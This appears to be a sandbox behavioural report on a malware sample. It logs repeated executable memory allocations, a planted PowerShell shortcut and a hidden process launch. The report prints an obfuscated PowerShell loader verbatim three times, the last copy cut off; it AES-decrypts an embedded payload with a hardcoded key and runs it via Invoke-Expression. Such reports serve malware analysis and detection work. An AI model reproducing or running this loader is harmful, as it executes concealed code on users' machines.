NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02541000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02542000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028cb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028cd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ce000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028cf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02931000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02932000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02933000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 24, 2024, 9:08 a.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02934000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell.exe -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87249095873756925133548634564426CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIZLpL9xl3Py+l8SR7slUHUevBi1kBPUVFUCXAdS1V5ry05GEIxWvXEOEv1VXBCN/6cFqtMoGP0r3wozPtH3gBxltdo0dRAPTvI+5L5jNRlmpL7WSN11Y+o37cmQECE8m5yoQaueGAvWVRkCK/PJggM1f7GsQuVUav7ecHNhuvfvbIUtomkHUSPUynPB7YxjwHb9VVASA6ynKfVj20Nfj8WQ7m2yfUEf4iX1Z2RtVRce/Tc/UOEG/UJWb/SMU7rylafB8vATtzQFPJtzBfjVsf3peHeI8xleZA8YPEScObOBTc+uNaMICEVs7R4BLmsc4l8PCLyph5Lgp++ElK7qI4jtp/RHIJuqorKpX6Z6enzP2OnM6Gdkj3oeTd6TDHXJRaUSOu4AP12kaFVPUHjF/0HzsFavMzg+Z0486QdMYNBAx5AM0K/ux8BInwP0WVlwkexz3i8PtSLHiOZjMZM0mfpBrZzyj7YNu+99FOBZSBWkgl7GF4VBexJkO7BuZQ/8KFjHyZNiHjGUzAMeLD2YOxqqb7qXZvV86/mnCaAdvTRkrdbsedMvxZLGwcdO/kFSezhOQHAxj0nTy50GK0fRfN+EouESXq0TyVPKn6RQ7NZA/tp6SscNfu0IZCTxk5yAfLRq0UUSRFHK7JDTbqfXFgnrlaDktcVcvJ7chZWsyZlaeTn8UD1NVuoPbwAo+cceAVYjSIEs/4nJQy4FeV3hup3tAK5+q1xAcHEfz5lyvj9gxOFUsAbIEtWoQq49ZMNoOe4mdm1N915TDKBfBvjhQWlKPOFU6VpIS1fjh9bD9luXJcqT3WMfXD2+rOvtqB77xcyJ5U4HPTw2wM5NXisVtECe42SWZhBCulh7qInAsksm8Uasns4sgc4u/dzWk9Pd72ZpmVeZlCQ5dmIrXeilYleXmsZPtjGXQdQXU1be07ioVuMLFRlQAYgvUZZAcqu1x2ndcER9XrnH5yo4xSvEfTYXNR7mJcPBdCf/a0OrfwlnDoNrIJVuNCW5tSSdt4dc6+HTvdpurrcwqDwVRoj1FvcEKPEZSpnqSICFzcP/VUBP5HPm+AxruprcAOd+XuLkUIu2P9E9RFLDfe/FyC6ZMBoNVfIUlre8xrGhKU8YplJh4xUKmzJWmGzQaX52PbhdD+oQK4QmH+gz31Xd26dXnY2i3pkowffE2WT0Hd1q8OtjkgmN3cEJtNHPOh+y74t++HAmn28qyqMsHrp3ZvFeLsn5CipIEWqbj085ABBwfkGiGHRoTArXWxB+KLgIqXhU9MJ5HCihOfq+K4TsBwkDBq0kGKVi7yYHM0H7cXTtl8xaeYdszb3+8UYMTd/VnYFBCIczEr8wLjI6lA+Wh4gMUfan/X7R0sMw8zDoJezuccj93Ja8+pzRDpUXE41+2rd+N+Js0A4OpwbrL2dMigMJlceKXw7S3skJXJNFR4GWUS8plXZkj+8KQAq6mLfuY81ETRclFSZ8AwZQXPZaQdPCL8cpqVBjdHDxaJGUO2W5/WV6XwBBZQBWYW14JnnGep6zNhQeAFLQFqG5brETFxYXmg7mMgkb9LdJXrFTc2W6wcp9XNvzBOgTYtHvCXLaKSJ4hp5EmpZvBWzE9CJvwVjkK4usRXyfei5Y3CB02D6OGurX9Un56ijcMiHjrmxs+O0kqc0JhxR8LJUXbao7SYEvms+CayWu2ST8GQ7smRUi0VR6bIx3AE3mSQ6HJQ5dNBANiQSmIg3deBJmWbspKm7azWwKCytzN//aoV7zQViOO/34qAvsHA7lEy/DLqHEd0w+bLgM0Lo5vCElEUh6CCXB3XJA==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87249095873756925133548634564426CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIZLpL9xl3Py+l8SR7slUHUevBi1kBPUVFUCXAdS1V5ry05GEIxWvXEOEv1VXBCN/6cFqtMoGP0r3wozPtH3gBxltdo0dRAPTvI+5L5jNRlmpL7WSN11Y+o37cmQECE8m5yoQaueGAvWVRkCK/PJggM1f7GsQuVUav7ecHNhuvfvbIUtomkHUSPUynPB7YxjwHb9VVASA6ynKfVj20Nfj8WQ7m2yfUEf4iX1Z2RtVRce/Tc/UOEG/UJWb/SMU7rylafB8vATtzQFPJtzBfjVsf3peHeI8xleZA8YPEScObOBTc+uNaMICEVs7R4BLmsc4l8PCLyph5Lgp++ElK7qI4jtp/RHIJuqorKpX6Z6enzP2OnM6Gdkj3oeTd6TDHXJRaUSOu4AP12kaFVPUHjF/0HzsFavMzg+Z0486QdMYNBAx5AM0K/ux8BInwP0WVlwkexz3i8PtSLHiOZjMZM0mfpBrZzyj7YNu+99FOBZSBWkgl7GF4VBexJkO7BuZQ/8KFjHyZNiHjGUzAMeLD2YOxqqb7qXZvV86/mnCaAdvTRkrdbsedMvxZLGwcdO/kFSezhOQHAxj0nTy50GK0fRfN+EouESXq0TyVPKn6RQ7NZA/tp6SscNfu0IZCTxk5yAfLRq0UUSRFHK7JDTbqfXFgnrlaDktcVcvJ7chZWsyZlaeTn8UD1NVuoPbwAo+cceAVYjSIEs/4nJQy4FeV3hup3tAK5+q1xAcHEfz5lyvj9gxOFUsAbIEtWoQq49ZMNoOe4mdm1N915TDKBfBvjhQWlKPOFU6VpIS1fjh9bD9luXJcqT3WMfXD2+rOvtqB77xcyJ5U4HPTw2wM5NXisVtECe42SWZhBCulh7qInAsksm8Uasns4sgc4u/dzWk9Pd72ZpmVeZlCQ5dmIrXeilYleXmsZPtjGXQdQXU1be07ioVuMLFRlQAYgvUZZAcqu1x2ndcER9XrnH5yo4xSvEfTYXNR7mJcPBdCf/a0OrfwlnDoNrIJVuNCW5tSSdt4dc6+HTvdpurrcwqDwVRoj1FvcEKPEZSpnqSICFzcP/VUBP5HPm+AxruprcAOd+XuLkUIu2P9E9RFLDfe/FyC6ZMBoNVfIUlre8xrGhKU8YplJh4xUKmzJWmGzQaX52PbhdD+oQK4QmH+gz31Xd26dXnY2i3pkowffE2WT0Hd1q8OtjkgmN3cEJtNHPOh+y74t++HAmn28qyqMsHrp3ZvFeLsn5CipIEWqbj085ABBwfkGiGHRoTArXWxB+KLgIqXhU9MJ5HCihOfq+K4TsBwkDBq0kGKVi7yYHM0H7cXTtl8xaeYdszb3+8UYMTd/VnYFBCIczEr8wLjI6lA+Wh4gMUfan/X7R0sMw8zDoJezuccj93Ja8+pzRDpUXE41+2rd+N+Js0A4OpwbrL2dMigMJlceKXw7S3skJXJNFR4GWUS8plXZkj+8KQAq6mLfuY81ETRclFSZ8AwZQXPZaQdPCL8cpqVBjdHDxaJGUO2W5/WV6XwBBZQBWYW14JnnGep6zNhQeAFLQFqG5brETFxYXmg7mMgkb9LdJXrFTc2W6wcp9XNvzBOgTYtHvCXLaKSJ4hp5EmpZvBWzE9CJvwVjkK4usRXyfei5Y3CB02D6OGurX9Un56ijcMiHjrmxs+O0kqc0JhxR8LJUXbao7SYEvms+CayWu2ST8GQ7smRUi0VR6bIx3AE3mSQ6HJQ5dNBANiQSmIg3deBJmWbspKm7azWwKCytzN//aoV7zQViOO/34qAvsHA7lEy/DLqHEd0w+bLgM0Lo5vCElEUh6CCXB3XJA==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW July 24, 2024, 9:08 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87249095873756925133548634564426CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIZLpL9xl3Py+l8SR7slUHUevBi1kBPUVFUCXAdS1V5ry05GEIxWvXEOEv1VXBCN/6cFqtMoGP0r3wozPtH3gBxltdo0dRAPTvI+5L5jNRlmpL7WSN11Y+o37cmQECE8m5yoQaueGAvWVRkCK/PJggM1f7GsQuVUav7ecHNhuvfvbIUtomkHUSPUynPB7YxjwHb9VVASA6ynKfVj20Nfj8WQ7m2yfUEf4iX1Z2RtVRce/Tc/UOEG/UJWb/SMU7rylafB8vATtzQFPJtzBfjVsf3peHeI8xleZA8YPEScObOBTc+uNaMICEVs7R4BLmsc4l8PCLyph5Lgp++ElK7qI4jtp/RHIJuqorKpX6Z6enzP2OnM6Gdkj3oeTd6TDHXJRaUSOu4AP12kaFVPUHjF/0HzsFavMzg+Z0486QdMYNBAx5AM0K/ux8BInwP0WVlwkexz3i8PtSLHiOZjMZM0mfpBrZzyj7YNu+99FOBZSBWkgl7GF4VBexJkO7BuZQ/8KFjHyZNiHjGUzAMeLD2YOxqqb7qXZvV86/mnCaAdvTRkrdbsedMvxZLGwcdO/kFSezhOQHAxj0nTy50GK0fRfN+EouESXq0TyVPKn6RQ7NZA/tp6SscNfu0IZCTxk5yAfLRq0UUSRFHK7JDTbqfXFgnrlaDktcVcvJ7chZWsyZlaeTn8UD1NVuoPbwAo+cceAVYjSIEs/4nJQy4FeV3hup3tAK5+q1xAcHEfz5lyvj9gxOFUsAbIEtWoQq49ZMNoOe4mdm1N915TDKBfBvjhQWlKPOFU6VpIS1fjh9bD9luXJcqT3WMfXD2+rOvtqB77xcyJ5U4HPTw2wM5NXisVtECe42SWZhBCulh7qInAsksm8Uasns4sgc4u/dzWk9Pd72ZpmVeZlCQ5dmIrXeilYleXmsZPtjGXQdQXU1be07ioVuMLFRlQAYgvUZZAcqu1x2ndcER9XrnH5yo4xSvEfTYXNR7mJcPBdCf/a0OrfwlnDoNrIJVuNCW5tSSdt4dc6+HTvdpurrcwqDwVRoj1FvcEKPEZSpnqSICFzcP/VUBP5HPm+AxruprcAOd+XuLkUIu2P9E9RFLDfe/FyC6ZMBoNVfIUlre8xrGhKU8YplJh4xUKmzJWmGzQaX52PbhdD+oQK4QmH+gz31Xd26dXnY2i3pkowffE2WT0Hd1q8OtjkgmN3cEJtNHPOh+y74t++HAmn28qyqMsHrp3ZvFeLsn5CipIEWqbj085ABBwfkGiGHRoTArXWxB+KLgIqXhU9MJ5HCihOfq+K4TsBwkDBq0kGKVi7yYHM0H7cXTtl8xaeYdszb3+8UYMTd/VnYFBCIczEr8wLjI6lA+Wh4gMUfan/X7R0sMw8zDoJezuccj93Ja8+pzRDpUXE41+2rd+N+Js0A4OpwbrL2dMigMJlceKXw7S3skJXJNFR4GWUS8plXZkj+8KQAq6mLfuY81ETRclFSZ8AwZQXPZaQdPCL8cpqVBjdHDxaJGUO2W5/WV6XwBBZQBWYW14JnnGep6zNhQeAFLQFqG5brETFxYXmg7mMgkb9LdJXrFTc2W6wcp9XNvzBOgTYtHvCXLaKSJ4hp5EmpZvBWzE9CJvwVjkK4usRXyfei5Y3CB02D6OGurX9Un56ijcMiHjrmxs+O0kqc0JhxR8LJUXbao7SYEvms+CayWu2ST8GQ7smRUi0VR6bIx3AE3mSQ6HJQ5dNBANiQSmIg3deBJmWbspKm7azWwKCytzN//aoV7z